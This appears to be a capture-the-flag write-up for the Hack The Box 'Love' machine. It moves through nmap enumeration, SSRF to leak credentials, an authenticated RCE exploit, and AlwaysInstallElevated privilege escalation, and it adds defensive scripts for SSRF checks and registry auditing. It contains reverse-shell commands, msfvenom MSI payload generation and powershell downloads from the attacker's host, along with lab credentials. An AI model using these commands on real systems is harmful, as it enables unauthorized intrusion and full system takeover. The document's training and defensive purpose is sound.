# Love

![](/files/Oi6i5O1j4YsIlmcPqA4b)

## Enumeration

As usual, we start with an nmap scan in order to find the open ports on the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.239 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the `allPorts` file.

```
# Nmap 7.92 scan initiated Mon Jan 10 17:31:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.239
Host is up (0.062s latency).
Not shown: 59778 closed tcp ports (reset), 5738 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
5985/tcp  open  wsman
5986/tcp  open  wsmans
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

# Nmap done at Mon Jan 10 17:32:10 2022 -- 1 IP address (1 host up) scanned in 27.61 seconds
```

As we see, there are quite a lot of open ports.
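Feeding the first scan into the second one by hand means retyping the port list. The following script, which is an added example and not part of the original writeup, parses an `nmap -oN` report, extracts the open TCP ports, builds the `-p` argument for the targeted scan, and also surfaces the two caveats hidden in the output above (the "retransmission cap hit" warning and the filtered-port count), both of which mean a `-T5` scan may have missed services. The sample report embedded below is constructed from a subset of the lines shown above.

```python
import re
from typing import List

# Constructed sample: a trimmed-down `nmap -oN` report in the same layout as the one above.
SAMPLE_ALLPORTS = """\
# Nmap 7.92 scan initiated Mon Jan 10 17:31:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.239
Host is up (0.062s latency).
Not shown: 59778 closed tcp ports (reset), 5738 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5985/tcp  open  wsman
49664/tcp open  unknown

# Nmap done at Mon Jan 10 17:32:10 2022 -- 1 IP address (1 host up) scanned in 27.61 seconds
"""

# One port line in -oN output: "<port>/<proto>  <state>  <service>"
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")
# The "Not shown:" summary line carries the filtered-port count.
FILTERED = re.compile(r"(\d+) filtered tcp ports")


def open_ports(report: str, proto: str = "tcp") -> List[int]:
    """Return the sorted list of ports reported as 'open' for the given protocol."""
    ports = set()
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(2) == proto and m.group(3) == "open":
            ports.add(int(m.group(1)))
    return sorted(ports)


def port_argument(report: str) -> str:
    """Comma-separated port list in the form nmap's -p option expects."""
    return ",".join(str(p) for p in open_ports(report))


def targeted_scan_command(report: str, target: str, outfile: str = "targeted") -> List[str]:
    """Build the argv for the follow-up script/version scan of the open ports."""
    return ["nmap", "-sC", "-sV", "-p" + port_argument(report), "-oN", outfile, target]


def scan_caveats(report: str) -> List[str]:
    """Flag conditions under which a fast scan may have missed open ports."""
    caveats = []
    if "retransmission cap hit" in report:
        caveats.append("nmap gave up on some ports (retransmission cap); rerun at a slower rate to confirm")
    m = FILTERED.search(report)
    if m and int(m.group(1)) > 0:
        caveats.append(f"{m.group(1)} ports were filtered (no response) and may still hide services")
    return caveats


if __name__ == "__main__":
    print(" ".join(targeted_scan_command(SAMPLE_ALLPORTS, "10.10.10.239")))
    for caveat in scan_caveats(SAMPLE_ALLPORTS):
        print("caveat:", caveat)
```

To use it on a real run, replace `SAMPLE_ALLPORTS` with the contents of the `allPorts` file; the caveat list is worth checking before trusting a `--min-rate 5000 -T5` result as complete.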

Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 10.10.10.239 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the `targeted` file.

```
# Nmap 7.92 scan initiated Mon Jan 10 17:35:33 2022 as: nmap -sCV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 -oN targeted 10.10.10.239
Nmap scan report for 10.10.10.239                                                                              
Host is up (0.065s latency).                                                                                   
                                                                                                               
PORT      STATE SERVICE      VERSION                                                                           
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)                            
|_http-title: Voting System using PHP                                                                          
| http-cookie-flags:                                                                                                                                                                                                           
|   /:                                                                                                         
|     PHPSESSID:                                                                                               
|_      httponly flag not set                                                                                  
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27                                          
135/tcp   open  msrpc        Microsoft Windows RPC                                                             
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                                                                                                                                     
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn:                                                                                                    
|_  http/1.1                                                                                                   
|_http-title: 403 Forbidden                                                                                    
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16                                                                        
|_Not valid after:  2022-01-18T14:00:16                                                                        
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27                                          
|_ssl-date: TLS randomness does not represent time                                                             
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)                           
3306/tcp  open  mysql?                                                                                         
| fingerprint-strings:                                                                                         
|   FourOhFourRequest, SSLSessionReq:                                                                          
|_    Host '10.10.14.18' is not allowed to connect to this MariaDB server                                      
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)                                   
|_http-title: 403 Forbidden                                                                                    
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27                                          
5040/tcp  open  unknown                                                                                        
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                           
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                    
|_http-title: Not Found                                                                                        
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-01-10T17:00:06+00:00; +21m35s from scanner time.                                                                                                                                                              
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                                                    
|_http-title: Not Found                                                            
| tls-alpn:                                                                                                                                                                                                                    
|_  http/1.1                                                                       
| ssl-cert: Subject: commonName=LOVE                                               
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19                                            
|_Not valid after:  2024-04-10T14:39:19                                            
7680/tcp  open  pando-pub?                                                         
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found                                                            
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                                                                                                                                                                   
SF-Port3306-TCP:V=7.92%I=7%D=1/10%Time=61DC6065%P=x86_64-pc-linux-gnu%r(SS
SF:LSessionReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Fou
SF:rOhFourRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:                                                               
|_clock-skew: mean: 2h21m35s, deviation: 4h00m01s, median: 21m34s
| smb2-security-mode:                                                              
|   3.1.1:                                                                         
|_    Message signing enabled but not required
| smb-security-mode:                                                               
|   account_used: guest                                                            
|   authentication_level: user                                                     
|   challenge_response: supported                                                  
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:                                                                
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love                                                            
|   NetBIOS computer name: LOVE\x00                                                
|   Workgroup: WORKGROUP\x00                                                       
|_  System time: 2022-01-10T08:59:52-08:00
| smb2-time:                                                                       
|   date: 2022-01-10T16:59:54                                                      
|_  start_date: N/A                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 17:38:32 2022 -- 1 IP address (1 host up) scanned in 178.95 seconds
```

There is quite a lot of information. Let's start with the basics. First, there is an HTTPS service running on port 443. Let's inspect its SSL certificate with the following command:

> openssl s_client -connect 10.10.10.239:443

* `s_client` implements a generic **SSL/TLS** client.
* `-connect` the **host:port** of the TLS service to connect to.

At some point we should see this:

```
Certificate chain                                          
 0 s:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb                                                                                                                       
   i:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb             
```

Now we know that the *Common Name (CN)* is `staging.love.htb` and the *Organizational Unit (OU)* is `love.htb`. Let's add both to the `/etc/hosts` file and see if there is virtual hosting.

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.239    staging.love.htb    love.htb
```

{% hint style="info" %}
**Virtual hosting** is a method for hosting multiple domain names (with separate handling of each name) on a single server.
{% endhint %}

Let's see what appears with each domain name. If we open our browser and go to `http://10.10.10.239`, we will see a login page that requires an *ID* and a *password*.

![](/files/MIVpUjFczvQ2FCOxRyZk)

If we search for `http://staging.love.htb`, we should see a *Free File Scanner* website.

![](/files/P5SEa0RDanVNJzvMswwG)

## Exploitation

All the other domain names show us a *403 Forbidden* message, so let's inspect this page a bit further. If we click on *Demo*, we should see something interesting: the page allows us to fetch the content of a specific URL.

Let's try something. If you look carefully at the nmap scan, you can see there is another HTTP service running on port *5000*, but if we try to view its content in the browser we get the *403 Forbidden* message.

![](/files/MlhiqeqUWXmF8WYybHXJ)

But maybe we can see its content through the utility we found on the *Demo* page. All we have to do is specify the `http://localhost:5000` URL.

![](/files/P3DlN7T1kuz9STW123R0)

And we got some credentials! This attack is called Server Side Request Forgery (SSRF).

{% hint style="info" %}
Server Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure.
{% endhint %}
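The root cause here is that the *Demo* page fetches whatever URL it is given, including `localhost`. The function below is an added example (not code from the original application or this writeup) showing the checks a server-side fetcher needs before it touches a user-supplied URL: only `http`/`https`, only the standard ports, an optional hostname allowlist, and a resolution step that rejects loopback, private, link-local and other non-global addresses, so a request for `http://localhost:5000` is refused instead of proxied. The `resolver` parameter, the `check_fetch_target` name and the sample URLs are my own; the resolver is injectable so the checks can be exercised offline.

```python
import ipaddress
import socket
from typing import Callable, Iterable, List, Optional, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve a hostname to all of its addresses with the system resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def is_internal(ip: IPAddress) -> bool:
    """True for any address a server-side fetcher should never reach on a user's behalf."""
    # An IPv4-mapped IPv6 address (::ffff:127.0.0.1) is judged as the IPv4 address it wraps.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (not ip.is_global or ip.is_loopback or ip.is_private
            or ip.is_link_local or ip.is_multicast or ip.is_unspecified)


def check_fetch_target(url: str,
                       resolver: Resolver = system_resolver,
                       allowed_ports: Iterable[int] = (80, 443),
                       allowed_hosts: Optional[Iterable[str]] = None) -> Optional[str]:
    """Return None if the URL may be fetched, otherwise the reason it was rejected.

    Checks run cheapest-first: scheme, host presence, embedded credentials, port,
    allowlist, and finally where the host actually resolves to.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    host = parts.hostname
    if not host:
        return "missing host"
    if parts.username or parts.password:
        return "credentials in URL"
    try:
        port = parts.port
    except ValueError:
        return "invalid port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in set(allowed_ports):
        return f"port {port} not allowed"
    if allowed_hosts is not None and host.lower() not in {h.lower() for h in allowed_hosts}:
        return "host not on allowlist"
    # Literal IPs are judged directly; names are resolved and every returned address is judged.
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return "host does not resolve"
    if not addresses:
        return "host does not resolve"
    for ip in addresses:
        if is_internal(ip):
            return f"resolves to internal address {ip}"
    return None


if __name__ == "__main__":
    # Constructed inputs mirroring the Demo page: the internal URL is refused, a public one passes.
    for candidate in ("http://localhost:5000", "http://127.0.0.1/", "https://example.com/"):
        print(candidate, "->", check_fetch_target(candidate) or "allowed")
```

Two design notes: the resolution check must be followed by connecting to the address that was checked (not by handing the hostname to an HTTP client that resolves it again), otherwise a DNS record that changes between the check and the fetch bypasses it; and a hostname allowlist (`allowed_hosts`) is the stronger control where the feature only ever needs to reach a known set of sites, with the address checks as defence in depth.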

![](/files/2uBZLxLJPhQKSN0hhbX9)

So now we have credentials, but for what? On `http://10.10.10.239` there was a login page, but it asks for an *ID* and a *password*, and what we have is a *username* and a *password*, so that's not going to work there. Let's try to list directories with gobuster.

> gobuster dir -u <http://10.10.10.239> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.239
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/19 22:31:33 Starting gobuster in directory enumeration mode
===============================================================
/Images               (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
/images               (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
/admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/] 
/plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
/includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
/dist                 (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]    
/licenses             (Status: 403) [Size: 421]                                    
/examples             (Status: 503) [Size: 402]                                    
/IMAGES               (Status: 301) [Size: 338] [--> http://10.10.10.239/IMAGES/]  
/%20                  (Status: 403) [Size: 302]                                    
/Admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/Admin/]   
/*checkout*           (Status: 403) [Size: 302]                                    
/Plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/Plugins/] 
/phpmyadmin           (Status: 403) [Size: 302]                                    
/webalizer            (Status: 403) [Size: 302]                                    
                                                                                   
===============================================================
2022/01/19 22:38:28 Finished
===============================================================
```

Gobuster found an `/Admin` directory, let's take a look at it.

![](/files/V0L1obbAABpCObmwoplh)

This login page is a bit different, because it asks for a *username* and a *password*. Let's try the credentials we found earlier.

![](/files/OIgLjrdFtl3l9fMecGvT)

And we got in! At this point I tried to look for common exploits on exploit-db.

{% hint style="info" %}
Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

<https://www.exploit-db.com/>
{% endhint %}

And I found an [Authenticated Remote Code Execution](https://www.exploit-db.com/exploits/49445) script written in *Python*. Before running it, we have to change the website address, the username, the password, our local IP address and the port on which we will be listening.

```
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.12" # Reverse shell IP
REV_PORT = "8888" # Reverse port 
# --------------------------------
```

Let's set a netcat listener on port *8888*.

> nc -lvnp 8888

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And if we run the exploit, we should get a shell as the user *phoebe* and can grab the user flag.

> python3 exploit.py

```
listening on [any] 8888 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60626
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>type c:\users\phoebe\desktop\user.txt
type c:\users\phoebe\desktop\user.txt
b195b1d1c75beff2ccb8c1b4d46bdb74

```

## Privilege Escalation

Time to become the *NT AUTHORITY\SYSTEM* user. If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tells us.

{% hint style="info" %}
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. You can download it from the official GitHub page:

<https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS>
{% endhint %}

Let's start Python's SimpleHTTPServer in our current directory.

> python -m SimpleHTTPServer

Now on the victim machine let's run the following command in order to download the winPEAS binary from our machine.

> powershell -c "wget <http://10.10.14.12:8000/winPEASx64.exe> -outfile winPEASx64.exe"

If we run the binary, a lot of text appears. But at some point we should see the following information:

```
͹ Checking AlwaysInstallElevated
  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!
```

It looks like *AlwaysInstallElevated* is set to 1 in both the *HKLM* and *HKCU* registry hives. If you research how to escalate privileges when *AlwaysInstallElevated* is set to 1 in both hives, you will notice that we can install a *Microsoft Windows Installer Package (MSI)* with SYSTEM privileges.

The following link explains how to exploit this vulnerability: <https://dmcxblue.gitbook.io/red-team-notes/privesc/unquoted-service-path>.
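For the defensive side of this finding, here is an added example (not part of winPEAS or of this writeup) that reads the same two registry values with Python's standard `winreg` module and rates the result. Windows Installer only honours the policy when the value is 1 under both `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`, so the evaluation distinguishes "both set" from "one set". The `winreg` import is guarded so the evaluation logic can be tested on a non-Windows host; the function names and status strings are my own.

```python
from typing import Dict, Optional, Tuple

try:
    import winreg  # standard library, but only present on Windows
except ImportError:  # the evaluation logic below does not need it
    winreg = None

# Policy location used by Windows Installer for AlwaysInstallElevated, in both hives.
INSTALLER_POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"

REMEDIATION = (
    "Set AlwaysInstallElevated to 0 (or delete it) in both HKLM and HKCU, and enforce it via "
    "Group Policy: Computer Configuration and User Configuration > Administrative Templates > "
    "Windows Components > Windows Installer > 'Always install with elevated privileges' = Disabled."
)


def read_policy_values() -> Dict[str, Optional[int]]:
    """Read AlwaysInstallElevated from HKLM and HKCU; None means the value is absent."""
    if winreg is None:
        raise RuntimeError("registry access requires Windows")
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    values: Dict[str, Optional[int]] = {}
    for name, hive in hives.items():
        try:
            with winreg.OpenKey(hive, INSTALLER_POLICY_KEY) as key:
                value, _value_type = winreg.QueryValueEx(key, VALUE_NAME)
                values[name] = int(value)
        except OSError:  # key or value missing: policy not configured in this hive
            values[name] = None
    return values


def evaluate(values: Dict[str, Optional[int]]) -> Tuple[str, str]:
    """Return (status, detail) for a pair of HKLM/HKCU values.

    VULNERABLE: both hives set to 1, so any user can install an MSI as SYSTEM.
    PARTIAL:    only one hive set; Windows Installer does not honour it, but the
                remaining half is one registry write away from a full exposure.
    OK:         neither hive enables the policy.
    """
    hklm = values.get("HKLM") or 0
    hkcu = values.get("HKCU") or 0
    if hklm == 1 and hkcu == 1:
        return "VULNERABLE", "AlwaysInstallElevated=1 in HKLM and HKCU. " + REMEDIATION
    if hklm == 1 or hkcu == 1:
        where = "HKLM" if hklm == 1 else "HKCU"
        return "PARTIAL", f"AlwaysInstallElevated=1 in {where} only. " + REMEDIATION
    return "OK", "AlwaysInstallElevated is not enabled in either hive."


def audit() -> Tuple[str, str]:
    """Read the live registry and evaluate it (Windows only)."""
    return evaluate(read_policy_values())


if __name__ == "__main__":
    # Constructed sample matching the winPEAS finding above, so the script runs anywhere.
    status, detail = evaluate({"HKLM": 1, "HKCU": 1})
    print(status, "-", detail)
```

On the affected host, `audit()` reads the real values; the sample call in the `__main__` block reproduces the state winPEAS reported.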

As we can run *MSI* files with elevated privileges, the idea is to create a malicious MSI file that sends our machine a reverse shell as the *NT AUTHORITY\SYSTEM* user. Let's create this malicious file from our machine with *msfvenom*.

> msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.12 lport=4444 -f msi -o reverse.msi

* `-p` indicates the type of **payload**.
* `lhost` local **host** IP.
* `lport` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.

To transfer the malicious MSI file to the victim machine we do the same process as before.

> python -m SimpleHTTPServer

Now on the victim machine let's run the following command in order to download the MSI file from our machine.

> powershell -c "wget <http://10.10.14.12:8000/reverse.msi> -outfile reverse.msi"

Before running the MSI file, let's set another netcat listener on port 4444.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

To run the malicious MSI file we have to execute the following command:

> msiexec /i reverse.msi

And we get the shell as the *NT AUTHORITY\SYSTEM* user. Finally, all we have to do is reap the harvest and take the root flag.

```
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60637
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
b386de5a9e7f3c5aa500dff096f96ba8
```

